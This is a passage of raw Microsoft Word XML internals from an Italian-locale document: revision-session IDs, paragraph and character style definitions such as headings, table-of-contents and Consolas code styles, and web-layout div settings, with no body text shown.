    <w:rsid w:val="00BA4352"/>
    <w:rsid w:val="00BB211B"/>
    <w:rsid w:val="00BB4E1B"/>
    <w:rsid w:val="00BB624D"/>
    <w:rsid w:val="00BB6E17"/>
    <w:rsid w:val="00BB78EF"/>
    <w:rsid w:val="00BD17A6"/>
    <w:rsid w:val="00BD4DD1"/>
    <w:rsid w:val="00BE0633"/>
    <w:rsid w:val="00BE0801"/>
    <w:rsid w:val="00BE1ABA"/>
    <w:rsid w:val="00BE231D"/>
    <w:rsid w:val="00BE4DBA"/>
    <w:rsid w:val="00BE7AEB"/>
    <w:rsid w:val="00BF4D6D"/>
    <w:rsid w:val="00BF6BFD"/>
    <w:rsid w:val="00C03999"/>
    <w:rsid w:val="00C03F86"/>
    <w:rsid w:val="00C102DB"/>
    <w:rsid w:val="00C205B9"/>
    <w:rsid w:val="00C2144D"/>
    <w:rsid w:val="00C22C48"/>
    <w:rsid w:val="00C23B8F"/>
    <w:rsid w:val="00C2486B"/>
    <w:rsid w:val="00C2554F"/>
    <w:rsid w:val="00C25F00"/>
    <w:rsid w:val="00C26524"/>
    <w:rsid w:val="00C26751"/>
    <w:rsid w:val="00C27294"/>
    <w:rsid w:val="00C3397C"/>
    <w:rsid w:val="00C34BD4"/>
    <w:rsid w:val="00C35843"/>
    <w:rsid w:val="00C369F0"/>
    <w:rsid w:val="00C403FC"/>
    <w:rsid w:val="00C4109A"/>
    <w:rsid w:val="00C425F3"/>
    <w:rsid w:val="00C43B24"/>
    <w:rsid w:val="00C467A7"/>
    <w:rsid w:val="00C47A74"/>
    <w:rsid w:val="00C47F23"/>
    <w:rsid w:val="00C55181"/>
    <w:rsid w:val="00C57C20"/>
    <w:rsid w:val="00C61E3D"/>
    <w:rsid w:val="00C620C3"/>
    <w:rsid w:val="00C662E6"/>
    <w:rsid w:val="00C667CE"/>
    <w:rsid w:val="00C6703A"/>
    <w:rsid w:val="00C7230C"/>
    <w:rsid w:val="00C7231A"/>
    <w:rsid w:val="00C7641F"/>
    <w:rsid w:val="00C76552"/>
    <w:rsid w:val="00C7727F"/>
    <w:rsid w:val="00C77501"/>
    <w:rsid w:val="00C77B0D"/>
    <w:rsid w:val="00C77F30"/>
    <w:rsid w:val="00C80532"/>
    <w:rsid w:val="00C80885"/>
    <w:rsid w:val="00C80D04"/>
    <w:rsid w:val="00C84967"/>
    <w:rsid w:val="00C942E4"/>
    <w:rsid w:val="00CA158F"/>
    <w:rsid w:val="00CA38B4"/>
    <w:rsid w:val="00CA4E8B"/>
    <w:rsid w:val="00CA53B6"/>
    <w:rsid w:val="00CA7C14"/>
    <w:rsid w:val="00CB0604"/>
    <w:rsid w:val="00CB1007"/>
    <w:rsid w:val="00CB3DC3"/>
    <w:rsid w:val="00CB4956"/>
    <w:rsid w:val="00CB49CC"/>
    <w:rsid w:val="00CB5262"/>
    <w:rsid w:val="00CB67BB"/>
    <w:rsid w:val="00CB6CB2"/>
    <w:rsid w:val="00CB70EE"/>
    <w:rsid w:val="00CC1D31"/>
    <w:rsid w:val="00CC2476"/>
    <w:rsid w:val="00CC2CBF"/>
    <w:rsid w:val="00CC561B"/>
    <w:rsid w:val="00CC74B6"/>
    <w:rsid w:val="00CD0191"/>
    <w:rsid w:val="00CD0EAC"/>
    <w:rsid w:val="00CD2603"/>
    <w:rsid w:val="00CD260C"/>
    <w:rsid w:val="00CD277B"/>
    <w:rsid w:val="00CE00B1"/>
    <w:rsid w:val="00CE1BC3"/>
    <w:rsid w:val="00CE266C"/>
    <w:rsid w:val="00CE4444"/>
    <w:rsid w:val="00CE5258"/>
    <w:rsid w:val="00CE52A2"/>
    <w:rsid w:val="00CE550A"/>
    <w:rsid w:val="00CE5837"/>
    <w:rsid w:val="00CE69F0"/>
    <w:rsid w:val="00CE7A3E"/>
    <w:rsid w:val="00CE7DBF"/>
    <w:rsid w:val="00CF0205"/>
    <w:rsid w:val="00CF0DD5"/>
    <w:rsid w:val="00CF0EDA"/>
    <w:rsid w:val="00CF34DD"/>
    <w:rsid w:val="00CF6A46"/>
    <w:rsid w:val="00CF6D1B"/>
    <w:rsid w:val="00D022B9"/>
    <w:rsid w:val="00D03BF6"/>
    <w:rsid w:val="00D04AFC"/>
    <w:rsid w:val="00D10013"/>
    <w:rsid w:val="00D10D66"/>
    <w:rsid w:val="00D133F6"/>
    <w:rsid w:val="00D14078"/>
    <w:rsid w:val="00D14689"/>
    <w:rsid w:val="00D16E6C"/>
    <w:rsid w:val="00D21117"/>
    <w:rsid w:val="00D21393"/>
    <w:rsid w:val="00D21CBE"/>
    <w:rsid w:val="00D22C0D"/>
    <w:rsid w:val="00D2420B"/>
    <w:rsid w:val="00D26661"/>
    <w:rsid w:val="00D26BDD"/>
    <w:rsid w:val="00D3376D"/>
    <w:rsid w:val="00D3624F"/>
    <w:rsid w:val="00D36336"/>
    <w:rsid w:val="00D37F2A"/>
    <w:rsid w:val="00D4198E"/>
    <w:rsid w:val="00D423FA"/>
    <w:rsid w:val="00D42CE4"/>
    <w:rsid w:val="00D42F96"/>
    <w:rsid w:val="00D4408D"/>
    <w:rsid w:val="00D454E6"/>
    <w:rsid w:val="00D455FE"/>
    <w:rsid w:val="00D4662F"/>
    <w:rsid w:val="00D51AE0"/>
    <w:rsid w:val="00D538CA"/>
    <w:rsid w:val="00D541CB"/>
    <w:rsid w:val="00D54E4B"/>
    <w:rsid w:val="00D55433"/>
    <w:rsid w:val="00D5680D"/>
    <w:rsid w:val="00D5771E"/>
    <w:rsid w:val="00D62B90"/>
    <w:rsid w:val="00D630BB"/>
    <w:rsid w:val="00D714E8"/>
    <w:rsid w:val="00D72AF7"/>
    <w:rsid w:val="00D73B25"/>
    <w:rsid w:val="00D773C6"/>
    <w:rsid w:val="00D85F32"/>
    <w:rsid w:val="00D860CF"/>
    <w:rsid w:val="00D876B5"/>
    <w:rsid w:val="00D91AD3"/>
    <w:rsid w:val="00D9276E"/>
    <w:rsid w:val="00D92B79"/>
    <w:rsid w:val="00D94032"/>
    <w:rsid w:val="00D976B7"/>
    <w:rsid w:val="00DA1B69"/>
    <w:rsid w:val="00DA4336"/>
    <w:rsid w:val="00DA6AE1"/>
    <w:rsid w:val="00DA74A2"/>
    <w:rsid w:val="00DB0292"/>
    <w:rsid w:val="00DB1A1D"/>
    <w:rsid w:val="00DB3292"/>
    <w:rsid w:val="00DB553C"/>
    <w:rsid w:val="00DB5A85"/>
    <w:rsid w:val="00DB68FF"/>
    <w:rsid w:val="00DC12A0"/>
    <w:rsid w:val="00DC1C5D"/>
    <w:rsid w:val="00DC2057"/>
    <w:rsid w:val="00DC2701"/>
    <w:rsid w:val="00DC373A"/>
    <w:rsid w:val="00DC4554"/>
    <w:rsid w:val="00DC744F"/>
    <w:rsid w:val="00DD1099"/>
    <w:rsid w:val="00DD1ADB"/>
    <w:rsid w:val="00DD1F0B"/>
    <w:rsid w:val="00DD21B2"/>
    <w:rsid w:val="00DD321B"/>
    <w:rsid w:val="00DD4119"/>
    <w:rsid w:val="00DD5066"/>
    <w:rsid w:val="00DE1998"/>
    <w:rsid w:val="00DE1CE5"/>
    <w:rsid w:val="00DE610F"/>
    <w:rsid w:val="00DE6959"/>
    <w:rsid w:val="00DF06B9"/>
    <w:rsid w:val="00DF071E"/>
    <w:rsid w:val="00DF0EA4"/>
    <w:rsid w:val="00DF1AB0"/>
    <w:rsid w:val="00DF46FE"/>
    <w:rsid w:val="00DF4E03"/>
    <w:rsid w:val="00DF578F"/>
    <w:rsid w:val="00E003CB"/>
    <w:rsid w:val="00E0077D"/>
    <w:rsid w:val="00E013DA"/>
    <w:rsid w:val="00E022E6"/>
    <w:rsid w:val="00E02AD5"/>
    <w:rsid w:val="00E077EA"/>
    <w:rsid w:val="00E106F3"/>
    <w:rsid w:val="00E11961"/>
    <w:rsid w:val="00E14144"/>
    <w:rsid w:val="00E1464F"/>
    <w:rsid w:val="00E16D66"/>
    <w:rsid w:val="00E21533"/>
    <w:rsid w:val="00E25638"/>
    <w:rsid w:val="00E257B1"/>
    <w:rsid w:val="00E26038"/>
    <w:rsid w:val="00E27495"/>
    <w:rsid w:val="00E27F96"/>
    <w:rsid w:val="00E31668"/>
    <w:rsid w:val="00E32C79"/>
    <w:rsid w:val="00E33CA3"/>
    <w:rsid w:val="00E349AE"/>
    <w:rsid w:val="00E34FFC"/>
    <w:rsid w:val="00E433B4"/>
    <w:rsid w:val="00E43657"/>
    <w:rsid w:val="00E44DE1"/>
    <w:rsid w:val="00E45362"/>
    <w:rsid w:val="00E45A4D"/>
    <w:rsid w:val="00E45E48"/>
    <w:rsid w:val="00E46194"/>
    <w:rsid w:val="00E46C8F"/>
    <w:rsid w:val="00E51257"/>
    <w:rsid w:val="00E5419A"/>
    <w:rsid w:val="00E54443"/>
    <w:rsid w:val="00E55A28"/>
    <w:rsid w:val="00E55D4B"/>
    <w:rsid w:val="00E61A93"/>
    <w:rsid w:val="00E625A9"/>
    <w:rsid w:val="00E62E2C"/>
    <w:rsid w:val="00E6372A"/>
    <w:rsid w:val="00E65047"/>
    <w:rsid w:val="00E66FB9"/>
    <w:rsid w:val="00E70E5D"/>
    <w:rsid w:val="00E711BB"/>
    <w:rsid w:val="00E72FE7"/>
    <w:rsid w:val="00E73D12"/>
    <w:rsid w:val="00E74964"/>
    <w:rsid w:val="00E77332"/>
    <w:rsid w:val="00E82DDD"/>
    <w:rsid w:val="00E8389A"/>
    <w:rsid w:val="00E83C5E"/>
    <w:rsid w:val="00E85785"/>
    <w:rsid w:val="00E8670F"/>
    <w:rsid w:val="00E92110"/>
    <w:rsid w:val="00E9573B"/>
    <w:rsid w:val="00E97F61"/>
    <w:rsid w:val="00EA018C"/>
    <w:rsid w:val="00EA093A"/>
    <w:rsid w:val="00EA33C5"/>
    <w:rsid w:val="00EA5857"/>
    <w:rsid w:val="00EB0425"/>
    <w:rsid w:val="00EB131F"/>
    <w:rsid w:val="00EB33EC"/>
    <w:rsid w:val="00EB4120"/>
    <w:rsid w:val="00EB5A05"/>
    <w:rsid w:val="00EB7331"/>
    <w:rsid w:val="00EC0712"/>
    <w:rsid w:val="00EC1787"/>
    <w:rsid w:val="00EC1EA3"/>
    <w:rsid w:val="00EC34DB"/>
    <w:rsid w:val="00EC58F7"/>
    <w:rsid w:val="00EC7769"/>
    <w:rsid w:val="00ED0377"/>
    <w:rsid w:val="00ED17CB"/>
    <w:rsid w:val="00ED2935"/>
    <w:rsid w:val="00ED33B8"/>
    <w:rsid w:val="00ED73F2"/>
    <w:rsid w:val="00EE240F"/>
    <w:rsid w:val="00EE6001"/>
    <w:rsid w:val="00EE7660"/>
    <w:rsid w:val="00EF2839"/>
    <w:rsid w:val="00EF3506"/>
    <w:rsid w:val="00EF549C"/>
    <w:rsid w:val="00EF56D1"/>
    <w:rsid w:val="00EF7CCA"/>
    <w:rsid w:val="00F0039E"/>
    <w:rsid w:val="00F01C02"/>
    <w:rsid w:val="00F023B3"/>
    <w:rsid w:val="00F035C7"/>
    <w:rsid w:val="00F076D9"/>
    <w:rsid w:val="00F07C07"/>
    <w:rsid w:val="00F138C4"/>
    <w:rsid w:val="00F13B82"/>
    <w:rsid w:val="00F16910"/>
    <w:rsid w:val="00F16C80"/>
    <w:rsid w:val="00F21A5F"/>
    <w:rsid w:val="00F27936"/>
    <w:rsid w:val="00F31F08"/>
    <w:rsid w:val="00F36C00"/>
    <w:rsid w:val="00F405B0"/>
    <w:rsid w:val="00F421E4"/>
    <w:rsid w:val="00F42A10"/>
    <w:rsid w:val="00F435AF"/>
    <w:rsid w:val="00F4513C"/>
    <w:rsid w:val="00F4576E"/>
    <w:rsid w:val="00F50E87"/>
    <w:rsid w:val="00F52899"/>
    <w:rsid w:val="00F5699C"/>
    <w:rsid w:val="00F56F8E"/>
    <w:rsid w:val="00F62500"/>
    <w:rsid w:val="00F62C86"/>
    <w:rsid w:val="00F6618D"/>
    <w:rsid w:val="00F70F7B"/>
    <w:rsid w:val="00F71A9F"/>
    <w:rsid w:val="00F72AEA"/>
    <w:rsid w:val="00F74647"/>
    <w:rsid w:val="00F75489"/>
    <w:rsid w:val="00F75CAB"/>
    <w:rsid w:val="00F761E0"/>
    <w:rsid w:val="00F762BF"/>
    <w:rsid w:val="00F765E1"/>
    <w:rsid w:val="00F77C4B"/>
    <w:rsid w:val="00F8003B"/>
    <w:rsid w:val="00F808C5"/>
    <w:rsid w:val="00F83521"/>
    <w:rsid w:val="00F8500A"/>
    <w:rsid w:val="00F85B57"/>
    <w:rsid w:val="00F85EFC"/>
    <w:rsid w:val="00F87B17"/>
    <w:rsid w:val="00F92AE7"/>
    <w:rsid w:val="00F92BAC"/>
    <w:rsid w:val="00F932A9"/>
    <w:rsid w:val="00F95C7D"/>
    <w:rsid w:val="00F964B9"/>
    <w:rsid w:val="00FA18E3"/>
    <w:rsid w:val="00FA3B72"/>
    <w:rsid w:val="00FA611C"/>
    <w:rsid w:val="00FA611D"/>
    <w:rsid w:val="00FB1ADB"/>
    <w:rsid w:val="00FB1D35"/>
    <w:rsid w:val="00FB708B"/>
    <w:rsid w:val="00FB77DE"/>
    <w:rsid w:val="00FB7AA5"/>
    <w:rsid w:val="00FC0E31"/>
    <w:rsid w:val="00FC1C4C"/>
    <w:rsid w:val="00FC421C"/>
    <w:rsid w:val="00FC46A6"/>
    <w:rsid w:val="00FD29BE"/>
    <w:rsid w:val="00FD4D21"/>
    <w:rsid w:val="00FE0097"/>
    <w:rsid w:val="00FE1E42"/>
    <w:rsid w:val="00FE2058"/>
    <w:rsid w:val="00FE2266"/>
    <w:rsid w:val="00FE22D3"/>
    <w:rsid w:val="00FE5E9E"/>
    <w:rsid w:val="00FF1CD1"/>
    <w:rsid w:val="00FF534B"/>
    <w:rsid w:val="00FF5519"/>
    <w:rsid w:val="00FF5E9E"/>
    <w:rsid w:val="00FF5FF8"/>
    <w:rsid w:val="00FF64FF"/>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FF8E9"/>
  <w14:defaultImageDpi w14:val="32767"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8D444351-606E-43C3-B5FF-D73188A4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59C6"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo1Carattere"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00A459C6"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="12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545604"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="Titolo3Carattere"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A545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D940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A14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464"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pidipagina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normale"/>
    <w:link w:val="PidipaginaCarattere"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A14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464"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo1Carattere">
    <w:name w:val="Titolo 1 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A459C6"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolosommario">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titolo1"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00321262"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:lang w:eastAsia="it-IT"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A0EF9"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A0EF9"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo2Carattere">
    <w:name w:val="Titolo 2 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00545604"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00545604"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="280"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasicorsivo">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="007B277E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormaleWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F36C00"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="it-IT"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005C6C97"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:aliases w:val="nome file"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="000E0A67"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nessunaspaziatura">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00964C05"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasidelicata">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00964C05"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Testosegnaposto">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00FF64FF"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Menzionenonrisolta">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003F33A3"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentovisitato">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003F33A3"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Didascalia">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008969FB"/>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3A5455"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titolo4Carattere">
    <w:name w:val="Titolo 4 Carattere"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:link w:val="Titolo4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D94032"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sommario3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00492E37"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="560"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="pw-post-body-paragraph">
    <w:name w:val="pw-post-body-paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:rsid w:val="00A0471D"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="it-IT"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Bodytext2">
    <w:name w:val="Body text (2)_"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:rsid w:val="00C77B0D"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Bodytext20">
    <w:name w:val="Body text (2)"/>
    <w:basedOn w:val="Bodytext2"/>
    <w:rsid w:val="00C77B0D"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:position w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:u w:val="none"/>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775">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="739327871">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="71240113">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1520966011">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="162358657">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="39939810">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="203835639">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
